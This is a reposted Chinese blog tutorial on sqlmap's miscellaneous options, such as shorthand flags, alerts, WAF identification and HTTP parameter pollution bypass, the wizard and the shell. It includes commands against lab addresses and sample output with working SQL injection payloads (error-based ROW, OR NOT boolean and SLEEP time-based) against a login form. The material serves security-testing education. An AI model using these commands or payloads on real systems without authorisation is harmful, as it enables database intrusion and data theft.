安全測試===sqlmap(肆)轉載
阿新 • • 發佈:2018-02-13
有著 quest ignore having dba pen 關閉 發出 轉載
十八、雜項
1.使用簡寫
參數:-z
有些參數組合是被經常用到的,如“--batch --random-agent --ignore-proxy --technique=BEU”,這樣寫一大串很不好看,在Sqlmap中,提供了一種簡寫的方式來縮短命令長度。
利用參數“-z”,每個參數都可以只寫前幾個字母,如“--batch”可以簡寫為“bat”。簡寫的原則是能夠有所區別、對應的參數唯一就行。各個參數用逗號隔開。如:
python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"
可以簡寫為:
python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"再如:
python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"可以簡寫為:
python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"
2.在成功檢測到註入點時報警
參數:--alert
該參數用於在找到新的註入點時發出警報,後跟一個用於發出警報的命令,如:
python sqlmap.py -r data.txt --alert "notify-send ‘找到漏洞了‘"部分輸出如下:
[18:59:36] [INFO] GET parameter ‘couno‘ appears to be ‘OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)‘ injectable (with --not-string="001") [18:59:36] [INFO] executing alerting shell command(s) (‘notify-send ‘找到漏洞了‘‘)
上例中用於發出警報的命令是Ubuntu中的notify-send命令。
3.設置問題的回答
參數:--answers
使用“--batch”以非交互模式運行時所有問題都以按默認值作為回答。有時不想以默認值為答案又想使用非交互模式,此時可以使用參數“--answers”對特定問題進行回答,若回答多個問題,以逗號分隔。如:
python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1"--technique=E --answers="extending=N" --batch部分輸出如下:
[xx:xx:56] [INFO] testing for SQL injection on GET parameter ‘id‘ heuristic (parsing) test showed that the back-end DBMS could be ‘MySQL‘. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[xx:xx:56] [INFO] do you want to include all tests for ‘MySQL‘ extending provided level (1) and risk (1)? [Y/n] N4.在成功檢測到註入點時發出“嘟”聲
參數:--beep
使用此參數可以在成功檢測到註入點時發出“嘟”聲。使用“-m”從日誌文件中檢測大量網站時該參數會格外有用。
5.清除Sqlmap創建的臨時表和自定義函數
參數:--cleanup
強烈推薦在測試結束後使用此參數清除Sqlmap創建的臨時表和自定義函數,Sqlmap會盡可能地清除數據庫管理系統和文件系統上的入侵痕跡。
6.檢查依賴
參數:--dependencies
Sqlmap的有些功能依賴第三方庫,在用到時發現沒有這些庫會報錯退出。使用此參數可以檢查依賴的第三方庫是否安裝,如:
python sqlmap.py --dependencies部分輸出如下:
[*] starting at 19:16:05
[19:16:05] [WARNING] sqlmap requires ‘python-kinterbasdb‘ third-party library in order to directly connect to the DBMS ‘Firebird‘. Download from http://kinterbasdb.sourceforge.net/
[19:16:05] [WARNING] sqlmap requires ‘python-pymssql‘ third-party library in order to directly connect to the DBMS ‘Sybase‘. Download from https://github.com/pymssql/pymssql
[19:16:05] [WARNING] sqlmap requires ‘python cx_Oracle‘ third-party library in order to directly connect to the DBMS ‘Oracle‘. Download from http://cx-oracle.sourceforge.net/
[19:16:05] [WARNING] sqlmap requires ‘python-psycopg2‘ third-party library in order to directly connect to the DBMS ‘PostgreSQL‘. Download from http://initd.org/psycopg/
[19:16:05] [WARNING] sqlmap requires ‘python ibm-db‘ third-party library in order to directly connect to the DBMS ‘IBM DB2‘. Download from https://github.com/ibmdb/python-ibmdb
[19:16:05] [WARNING] sqlmap requires ‘python jaydebeapi & python-jpype‘ third-party library in order to directly connect to the DBMS ‘HSQLDB‘. Download from https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/
[19:16:05] [WARNING] sqlmap requires ‘python ibm-db‘ third-party library in order to directly connect to the DBMS ‘Informix‘. Download from https://github.com/ibmdb/python-ibmdb
[19:16:05] [WARNING] sqlmap requires ‘python-pyodbc‘ third-party library in order to directly connect to the DBMS ‘Microsoft Access‘. Download from https://github.com/mkleehammer/pyodbc
[19:16:05] [WARNING] sqlmap requires ‘python-pymssql‘ third-party library in order to directly connect to the DBMS ‘Microsoft SQL Server‘. Download from https://github.com/pymssql/pymssql
[19:16:05] [WARNING] sqlmap requires ‘python-impacket‘ third-party library for out-of-band takeover feature. Download from http://code.google.com/p/impacket/
[19:16:05] [WARNING] sqlmap requires ‘python-ntlm‘ third-party library if you plan to attack a web application behind NTLM authentication. Download from http://code.google.com/p/python-ntlm/
[19:16:05] [WARNING] sqlmap requires ‘websocket-client‘ third-party library if you plan to attack a web application using WebSocket. Download from https://pypi.python.org/pypi/websocket-client/
[*] shutting down at 19:16:05可以看到我缺少的主要是用於連接數據庫的第三方庫。
7.關閉彩色輸出
參數:--disable-coloring
8.指定使用Google dork結果的某頁
參數:--gpage
使用參數“-g”時默認默認選擇Google dork結果的前100條做註入測試。結合使用此參數,可以指定使用Google dork結果的某頁。
9.使用HTTP參數汙染
參數:--hpp
HTTP參數汙染是繞過WAF/IPS/IDS的一種技術,詳情見此處。這一技術針對ASP/IIS和ASP.NET/IIS平臺尤其有效。如果懷疑目標受WAF/IPS/IDS保護,可以嘗試用此參數進行繞過。
10.徹底檢測WAF/IPS/IDS
參數:--identify-waf
Sqlmap可以識別WAF/IPS/IDS以便用戶進行針對性操作(如:添加“--tamper”)。目前Sqlmap支持檢測30多種不同的WAF/IPS/IDS,如Airlock和Barracuda WAF等。檢測WAF的腳本可以在安裝目錄的waf目錄中找到。
下例的目標是MySQL,受ModSecurity WAF保護:
python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3部分輸出如下:
[xx:xx:23] [INFO] testing connection to the target URL
[xx:xx:23] [INFO] heuristics detected web page charset ‘ascii‘
[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘USP Secure Entry Server (United Security Providers)‘[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘BinarySEC Web Application Firewall (BinarySEC)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Hyperguard Web Application Firewall (art of defence Inc.)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Cisco ACE XML Gateway (Cisco Systems)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘TrafficShield (F5 Networks)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘KONA Security Solutions (Akamai Technologies)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Incapsula Web Application Firewall (Incapsula/Imperva)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘CloudFlare Web Application Firewall (CloudFlare)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Barracuda Web Application Firewall (Barracuda Networks)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘webApp.secure (webScurity)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Proventia Web Application Security (IBM)‘
[xx:xx:23] [DEBUG] declared web page charset ‘iso-8859-1‘
[xx:xx:23] [DEBUG] page not found (404)
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘KS-WAF (Knownsec)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘NetScaler (Citrix Systems)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Jiasule Web Application Firewall (Jiasule)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘WebKnight Application Firewall (AQTRONIX)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘AppWall (Radware)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘ModSecurity: Open Source Web Application Firewall (Trustwave)‘
[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified ‘ModSecurity: Open Source Web Application Firewall (Trustwave)‘. Please consider usage of tamper scripts (option ‘--tamper‘)參數:--skip-waf
默認地Sqlmap會發送虛假的SQL註入playload以試探目標是否有保護措施。如有任何問題,用戶可以使用參數“--skip-waf”來禁用這一技術。
11.模仿智能手機
參數:--mobile
有些網站對智能手機和桌面環境的返回是不同的。當需要測試這種網站的智能手機頁面時可以設置一個智能手機的User-Agent,或者更簡單地,使用此參數,Sqlmap會在執行時詢問要模仿成流行的手機中的哪種,如:
$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
[...]
which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
[1] Apple iPhone 4s (default)
[2] BlackBerry 9900
[3] Google Nexus 7
[4] HP iPAQ 6365
[5] HTC Sensation
[6] Nokia N97
[7] Samsung Galaxy S
> 1
[...]12.離線模式(僅僅使用會話數據)
參數:--offline
添加此參數,Sqlmap將僅僅使用以前存儲的會話數據做測試而不向目標發送任何數據包。
13.在Google dork中展示頁面權重
參數:--page-rank
與參數“-g”一起使用,這會使Sqlmap向Google發起更多的請求並展示頁面權重。
14.從輸出目錄中安全移除所有內容
參數:--purge-output
當用戶想要安全地刪除輸出目錄中的所有內容時使用此參數。所謂安全刪除,不僅僅是刪除,而是在刪除前先用隨機數據覆蓋原有數據,甚至對文件名和目錄名也進行重命名以覆蓋舊名稱,所有覆蓋工作完成後才執行刪除。最後,輸出目錄中會一無所有。如:
python sqlmap.py --purge-output -v 3部分輸出如下:
[*] starting at 19:51:36
[19:51:36] [DEBUG] cleaning up configuration parameters
[19:51:36] [INFO] purging content of directory ‘/home/werner/.sqlmap/output‘...
[19:51:36] [DEBUG] changing file attributes
[19:51:36] [DEBUG] writing random data to files
[19:51:36] [DEBUG] truncating files
[19:51:36] [DEBUG] renaming filenames to random values
[19:51:36] [DEBUG] renaming directory names to random values
[19:51:36] [DEBUG] deleting the whole directory tree
[*] shutting down at 19:51:3615.快速掃描
參數:--smart
當有大量URL要進行測試(如:“-m”),目的是盡快找出其中存在的某些註入點而有所遺漏也沒有關系時可以使用“--smart”進行正向啟發式掃描。此時只有讓數據庫管理系統報錯的參數才會做進一步測試,其余URL均被跳過。如:
$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart
[...]
[xx:xx:14] [INFO] testing if GET parameter ‘ca‘ is dynamic
[xx:xx:14] [WARNING] GET parameter ‘ca‘ does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter ‘ca‘ might not be injectable
[xx:xx:14] [INFO] skipping GET parameter ‘ca‘
[xx:xx:14] [INFO] testing if GET parameter ‘user‘ is dynamic
[xx:xx:14] [WARNING] GET parameter ‘user‘ does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter ‘user‘ might not be injectable
[xx:xx:14] [INFO] skipping GET parameter ‘user‘
[xx:xx:14] [INFO] testing if GET parameter ‘id‘ is dynamic
[xx:xx:14] [INFO] confirming that GET parameter ‘id‘ is dynamic
[xx:xx:14] [INFO] GET parameter ‘id‘ is dynamic
[xx:xx:14] [WARNING] reflective value(s) found and filtering out
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter ‘id‘ might be
injectable (possible DBMS: ‘MySQL‘)
[xx:xx:14] [INFO] testing for SQL injection on GET parameter ‘id‘ heuristic (parsing) test showed that the back-end DBMS could be ‘MySQL‘. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for ‘MySQL‘ extending provided level (1) and risk (1)? [Y/n] Y
[xx:xx:14] [INFO] testing ‘AND boolean-based blind - WHERE or HAVING clause‘
[xx:xx:14] [INFO] GET parameter ‘id‘ is ‘AND boolean-based blind - WHERE or HAVING clause‘ injectable
[xx:xx:14] [INFO] testing ‘MySQL >= 5.0 AND error-based - WHERE or HAVING clause‘
[xx:xx:14] [INFO] GET parameter ‘id‘ is ‘MySQL >= 5.0 AND error-based - WHERE or HAVING clause‘ injectable
[xx:xx:14] [INFO] testing ‘MySQL inline queries‘
[xx:xx:14] [INFO] testing ‘MySQL > 5.0.11 stacked queries‘
[xx:xx:14] [INFO] testing ‘MySQL < 5.0.12 stacked queries (heavy query)‘
[xx:xx:14] [INFO] testing ‘MySQL > 5.0.11 AND time-based blind‘
[xx:xx:24] [INFO] GET parameter ‘id‘ is ‘MySQL > 5.0.11 AND time-based blind‘ injectable
[xx:xx:24] [INFO] testing ‘MySQL UNION query (NULL) - 1 to 20 columns‘
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[xx:xx:24] [INFO] target URL appears to have 3 columns in query
[xx:xx:24] [INFO] GET parameter ‘id‘ is ‘MySQL UNION query (NULL) - 1 to 20 columns‘ injectable
[...]16.通過關鍵詞使用或跳過payload
參數:--test-filter
若只想使用包含關鍵詞“ROW”的payload可使用參數“--test-filter=ROW”。下面是以Mysql為目標的例子:
python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --batch --test-filter=ROW部分輸出如下:
[xx:xx:39] [INFO] GET parameter ’id’ is dynamic
[xx:xx:39] [WARNING] reflective value(s) found and filtering out
[xx:xx:39] [INFO] heuristic (basic) test shows that GET parameter ’id’ might be injectable (possible DBMS: ’MySQL’)
[xx:xx:39] [INFO] testing for SQL injection on GET parameter ’id’
[xx:xx:39] [INFO] testing ’MySQL >= 4.1 AND error-based - WHERE or HAVING clause’
[xx:xx:39] [INFO] GET parameter ’id’ is ’MySQL >= 4.1 AND error-based - WHERE or HAVING clause’ injectable GET parameter ’id’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 3 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
Payload: id=1 AND ROW(4959,4971)>(SELECT COUNT(*),CONCAT(0x3a6d70623a,(SELECT (CASE WHEN (4959=4959) THEN 1 ELSE 0 END)),0x3a6b7a653a,FLOOR(RAND(0)*2))x FROM (SELECT 4706 UNION SELECT 3536 UNION SELECT 7442 UNION SELECT 3470)a GROUP BY x)
---參數:--test-skip
若不想使用包含關鍵詞“BENCHMARK”的payload可使用參數“--test-skip=BENCHMARK”。
17.交互式Sqlmap Shell
參數:--sqlmap-shell
使用此參數可以打開一個交互式的Sqlmap Shell,支持歷史記錄。如:
werner@Yasser:~$ sqlmap --sqlmap-shell
___
__H__
___ ___[.]_____ ___ ___ {1.1.10#stable}
|_ -| . ["] | .‘| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
sqlmap-shell> -u "192.168.56.102"
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user‘s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:22:46
[20:22:46] [INFO] testing connection to the target URL
[20:22:46] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[20:22:46] [INFO] testing if the target URL is stable
[20:22:47] [INFO] target URL is stable
[20:22:47] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter ‘id‘ in ‘www.site.com/index.php?id=1‘)
[*] shutting down at 20:22:47
___
__H__
___ ___[.]_____ ___ ___ {1.1.10#stable}
|_ -| . ["] | .‘| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
sqlmap-shell> exit18.為初學者準備的簡單向導
參數:--wizard
Sqlmap特地為初學者準備了一個有著盡可能少問題的工作流的向導。用戶輸入目標後若一直按回車選擇默認回答到工作流的最後也會得到一個正確的結果。如:
werner@Yasser:~$ sqlmap --wizard
___
__H__
___ ___["]_____ ___ ___ {1.1.10#stable}
|_ -| . [)] | .‘| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user‘s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:39:41
[20:39:41] [INFO] starting wizard interface
Please enter full target URL (-u): http://192.168.56.102/login.php
POST data (--data) [Enter for None]: username=001&password=003
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Intermediate
[3] All
> 1
sqlmap is running, please wait..
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: username=001%‘ OR NOT 2143=2143#&password=003
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (comment)
Payload: username=001%‘ OR SLEEP(5)#&password=003
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.0.12
banner: ‘5.5.50-0ubuntu0.14.04.1‘
current user: ‘root@localhost‘
current database: ‘DSSchool‘
current user is DBA: True
[*] shutting down at 20:40:07總結
完整閱讀Sqlmap官方手冊後終於對Sqlmap有了一個較為全面的認識。以前只是有所耳聞,現在切實地感受到了Sqlmap的強大,也愈加敬佩Sqlmap的兩位作者:
- Bernardo Damele A. G. (@inquisb)
- Miroslav Stampar (@stamparm)
參考文獻
- sqlmap官網
- SqlMap用戶手冊
- sqlmap批量掃描burpsuite請求日誌記錄
- How to get past the login page with Wget?
- 筆記: Data Retrieval over DNS in SQL Injection Attacks
安全測試===sqlmap(肆)轉載